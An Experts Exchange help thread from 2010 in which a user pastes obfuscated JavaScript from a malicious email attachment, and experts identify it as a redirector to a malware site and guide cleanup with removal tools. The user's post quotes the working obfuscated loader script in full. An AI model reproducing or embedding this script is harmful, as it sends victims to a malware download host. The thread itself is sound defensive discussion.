[2 days left] What’s wrong with your cloud strategy? Learn why multicloud solutions matter with Nimble Storage.Register Now

x
?
Solved

Does Anyone Know This Malicious Attachment

Posted on 2010-09-20
20
Medium Priority
?
1,053 Views
Last Modified: 2013-11-22
Hi,

I just received one of those spam emails that had an attachment inside it from what looked like a person I recognised. The attachment was a not too unfamiliar report.html name and I opened it with firefox.

The attachment was a few lines of javascript which I have included below for reference and appear to be part of the jsunpack tool.

After clicking on the attacment, a line of text appeared in the browser along the lines of please wait a few seconds. At this point I right clicked the attachment and ran an AVG scan on it which reported Malware.

Additionally A window popped up which appeared to be Windows Firewall asking me if I wanted to block Windows Explorer. I clicked "Block" and then shutdown the computer.

I re-booted and all seems to be OK but the Windows Firewall message is displayed asking if I want to Keep Blocking Windows Explorer.

Does anyone understand the code below and know if this is a virus / trojan that I can find out what it does and try to remove it ? I have run a full AVG scan but it doesnt report a virus is present.

Many thanks

<script language="JavaScript" type="text/javascript">function bn6s(m0ga){var
lpr5,co7a="",idmu,s1d5="goac>tep \":/;iv=b-nq.rhfuxm0sl<",os9w,yvsg=s1d5.length;eval(unescape("%66un%63ti%6Fn b%7677%28jn%63v){%63o7%61+=%6Ancv%7D"));for(os9w=0;os9w<m0ga.length;os9w++){idmu=m0ga.charAt(os9w);lpr5=s1d5.indexOf(idmu);if(lpr5>-1){lpr5-=(os9w+1)%yvsg;if(lpr5<0){lpr5+=yvsg;}bv77(s1d5.charAt(lpr5));}else{bv77(idmu);}}eval(unescape("%64oc%75me%6Et.w%72it%65(c%6F7a)%3Bco%37a=%22%22;"));}bn6s("gs\"\"pvliv-snops<o0\"mi;lrb>>g<-tp. qvaqo< mcnqhmslere.ll=oa-<.g;0fm:ot--r=");</script><noscript>To display this page you need a browser that supports JavaScript.</noscript>
0
Comment
Question by:ls21gce
[X]
Welcome to Experts Exchange

Add your voice to the tech community where 5M+ people just like you are talking about what matters.

  • Help others & share knowledge
  • Earn cash & points
  • Learn & ask questions
  • 7
  • 5
  • 3
  • +3
20 Comments
 
LVL 7

Expert Comment

by:John Jennings
ID: 33718140
Hard to say for sure exactly what it does.

It appears to use some encryption.
0
 
LVL 7

Expert Comment

by:John Jennings
ID: 33718145
On a side-note,

Go to Google and download MalwareBytes Anti-Malware, their free version. Install it, and run a scan with it. I bet it finds something.
0
 
LVL 8

Expert Comment

by:hello_everybody
ID: 33718767
It will direct you to: http://nobletree.org/x.html (that specific page doesn't exist, but the website does).

I hope that helps!
0
Independent Software Vendors: We Want Your Opinion

We value your feedback.

Take our survey and automatically be enter to win anyone of the following:
Yeti Cooler, Amazon eGift Card, and Movie eGift Card!

 
LVL 7

Expert Comment

by:John Jennings
ID: 33718959
0
 
LVL 30

Expert Comment

by:Thomas Zucker-Scharff
ID: 33718968
0
 

Author Comment

by:ls21gce
ID: 33719438
What is this nobletree.org website about ? I clicked on this but it is some kind of investments website ?
Is there really a guy on here masquerading as a "Master" just to send people to his investments site ?
0
 
LVL 30

Expert Comment

by:Thomas Zucker-Scharff
ID: 33719705
As I said don't go there.  What ever the site is, it isn't worth endangering your computer/identity over.  Whenever you have a questionable website, if youdon't use a link checker like linkextender, AVG link checker, or Web of Trust, use F-secure's URL checker:

https://browsingprotectionbeta.f-secure.com/swp/home
0
 

Author Comment

by:ls21gce
ID: 33719944
Can I just recap on your view of this embedded javascript code...

By opening this code in a browser, it will not have been able to deposit any sort of "payload" onto my computer in the form of virus etc. Instead it is a harmless re-direction to some kind of investments website in an attempt to gather business ?

Thanks
0
 
LVL 30

Expert Comment

by:Thomas Zucker-Scharff
ID: 33719973
It is a redirection to that site, but according to the f-secure site it is anything BUT harmless - beware of a payload from that site.
0
 
LVL 30

Expert Comment

by:Sudeep Sharma
ID: 33720590
I have saved the above said code into a file and uploaded to Virustotal.com and it reported that atleast 9 antivirus vendor found this code suspicious. Here are the ones which have detected the virus:

Authentium    5.2.0.5    2010.09.20    HTML/Redir.C
ClamAV    0.96.2.0-git    2010.09.20    JS.Generic
F-Prot    4.6.2.117    2010.09.20    HTML/Redir.C
Kaspersky    7.0.0.125    2010.09.20    Trojan-Downloader.JS.Small.ov
Microsoft    1.6201    2010.09.20    VirTool:JS/Obfuscator.W
NOD32    5465    2010.09.20    JS/Redirector.NAU
PCTools    7.0.3.5    2010.09.20    Trojan.Webkit
Sophos    4.57.0    2010.09.20    JS/WndRed-B
VirusBuster    12.65.16.0    2010.09.20    JS.Redirector.Gen.13

There is no detail information available on net.

http://www.securelist.com/en/descriptions/15411634/Trojan-Downloader.JS.Small.ov

Since you mentioned that AVG detected it so I think you are safe and no harmful files are downloaded to your computer.

Sudeep
0
 

Author Comment

by:ls21gce
ID: 33720819
Hi Sudeep,

Thanks for your comments but I am not so confident that there was no harm done to my system.

What happened was that I received the message PLEASE WAITING 4 SECOND...
Then another window popped up which looked like it was from Windows Firewall asking me if I wanted to block Windows Explorer. I immediately clicked on the "Block" button thinking I was doing the right thing but I now suspect this was actually a fake screen designed to look like Windows Firewall and when I clicked I executed a payload. This was when my screen went blank and appeared to be scanning through files in DOS mode. I immediately executed a shutdown but this was likely to be too late.

I have re-booted my system and the same pop-up message appeared asking if I wanted to keep blocking Windows Explorer to which I clicked on "Keep Blocking" and all seems to be working OK but how can I tell if my computer or our network is now infected ?

I have executed an AVG virus scan which shows nothing.

0
 
LVL 30

Accepted Solution

by:
Sudeep Sharma earned 2000 total points
ID: 33720840
Just to make sure the system is clean do following:

Try HitManpro to make sure anything which might be left behind is clean:
32bit
http://dl.surfright.nl/HitmanPro35.exe
http://download.cnet.com/Hitman-Pro-3/3000-2239_4-10895604.html

64bit
http://dl.surfright.nl/HitmanPro35_x64.exe

If issue is not resolved by these tools try TDSSKiller:
http://support.kaspersky.com/downloads/utils/tdsskiller.zip
http://support.kaspersky.com/downloads/utils/tdsskiller.exe

Tutorial on TDSSKiller:
http://support.kaspersky.com/viruses/solutions?qid=208280684

If this does not resolve your issue then try Combofix:

Download Combofix
http://download.bleepingcomputer.com/sUBs/ComboFix.exe
http://www.forospyware.com/sUBs/ComboFix.exe
http://subs.geekstogo.com/ComboFix.exe

Tutorial on how to use combofix:
http://www.bleepingcomputer.com/combofix/how-to-use-combofix

Post logs here for further analysis.

Sudeep
0
 

Author Comment

by:ls21gce
ID: 33721465
Hi Sudeep,

I have run all three of the tools you suggested. There were a further .exe files identified and removed that were not seen by AVG. They were a.exe created today in My Documents and what looked like the same program (by size) in Application Data/Tivy/apola.exe So it looks like this had deposited something onto my system but what it is and whether all instances are removed is another question. I am just not sure if I can trust my system any more as this appears to be a new threat. I cant find any reference to Tivy/apola on the net anywhere...Also it detected Variant.Kazy.711 which I can also not find.

I have also posted the logs as you suggested.

Many thanks
Combo-Fix-log.txt
Hitman-log.xml
TDSSKiller.2.4.2.1-20.09.2010-23.txt
0
 
LVL 30

Expert Comment

by:Sudeep Sharma
ID: 33728202
Could you please run Combofix one more time and paste the logs here?

Sudeep
0
 

Author Comment

by:ls21gce
ID: 33729314
Hi Sudeep,

I have now re-run the COMBOFIX Tool and the log of Run2 is attached

Thanks
Combo-Fix-log-Run2.txt
0
 
LVL 30

Expert Comment

by:Sudeep Sharma
ID: 33729848
Combofix logs above seems pretty clean to me. Are you still noticing any suspicious EXE anywhere in the system?

Even after reboot?

Sudeep
0
 

Author Comment

by:ls21gce
ID: 33730227
Hi Sudeep,

I am not noticing anything out of the ordinary, apart from the odd unexpected MS Outlook abend but I have an unnerving feeling almost paranoia that if I log into my online banking account or enter my credit card details that there might be an undetected trojan gathering the data to be sent to a rogue website somewhere.

I would certainly feel a lot happier if one of the big anti-virus companies tested this virus to find out what it is doing.

Do you think it will now be possible to trust this PC is clean and safe ?

Thanks
0
 
LVL 2

Expert Comment

by:waldosmx
ID: 33737486
Hi Is21gce, I recomend you start a topic here ;) geekstogo.com/forum/forum/37-virus-spyware-malware-removal/
0
 
LVL 30

Expert Comment

by:Sudeep Sharma
ID: 33737523
Since most of things are been removed I think you are good to go. However we could not say for sure if there is anything else which is left behind. But I must say you are in position now where you could easily take the backup of your system and do a clean install.

Sudeep
0
 

Author Closing Comment

by:ls21gce
ID: 33742709
Top Notch Advice !
0

Featured Post

Are You Ready for GDPR?

With the GDPR deadline set for May 25, 2018, many organizations are ill-prepared due to uncertainty about the criteria for compliance. According to a recent WatchGuard survey, a staggering 37% of respondents don't even know if their organization needs to comply with GDPR. Do you?

Question has a verified solution.

If you are experiencing a similar issue, please ask a related question

Ransomware continues to be a growing problem for both personal and business users alike and Antivirus companies are still struggling to find a reliable way to protect you from this dangerous threat.
If you are looking at this article, you have most likely been hit by some version of ransomware and are trying to find out if there is anything you can do, or what way you should react - READ ON!
Established in 1997, Technology Architects has become one of the most reputable technology solutions companies in the country. TA have been providing businesses with cost effective state-of-the-art solutions and unparalleled service that is designed…
Email security requires an ever evolving service that stays up to date with counter-evolving threats. The Email Laundry perform Research and Development to ensure their email security service evolves faster than cyber criminals. We apply our Threat…

656 members asked questions and received personalized solutions in the past 7 days.

Join the community of 500,000 technology professionals and ask your questions.

Join & Ask a Question